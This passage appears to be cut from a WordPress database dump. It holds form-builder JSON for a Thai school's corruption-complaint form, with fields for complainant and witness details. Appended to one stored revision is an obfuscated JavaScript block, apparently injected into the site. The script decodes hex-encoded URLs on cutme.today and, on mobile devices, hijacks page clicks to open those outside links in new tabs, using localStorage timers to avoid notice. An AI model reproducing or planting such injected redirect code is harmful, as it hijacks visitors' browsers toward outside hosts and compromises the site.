\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e08\\u0e31\\u0e14\\u0e2a\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e17\\u0e32\\u0e07 E-mail : 33010169@sisaketedu1.go.th\",\"choices\":{\"1\":{\"label\":\"\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c \\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 (\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07)\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"474\",\"field_id\":17,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"33010169@sisaketedu1.go.th\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','474-revision-v1','','','2024-08-03 22:02:19','2024-08-03 15:02:19','',474,'http://pakhaeng.ssk.in.th/?p=518',0,'revision','',0),
(519,1,'2024-08-03 22:03:41','2024-08-03 15:03:41','{\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e01\\u0e23\\u0e2d\\u0e01 \\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e43\\u0e2b\\u0e49\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : 08x-xxx-xxxx\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : xxx@email.com\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e0a\\u0e37\\u0e48\\u0e2d - \\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"16\":{\"id\":\"16\",\"type\":\"text\",\"label\":\"\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\\/\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e38\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\\/\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e1c\\u0e39\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23 \\u0e04\\u0e23\\u0e39\\u0e1c\\u0e39\\u0e49\\u0e2a\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d \\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e46 \",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\",\"description\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"checkbox\",\"label\":\"\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23 \\/ \\u0e2b\\u0e25\\u0e31\\u0e01\\u0e10\\u0e32\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21 (\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35) \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e08\\u0e31\\u0e14\\u0e2a\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e17\\u0e32\\u0e07 E-mail : 33010169@sisaketedu1.go.th\",\"choices\":{\"1\":{\"label\":\"\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c \\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 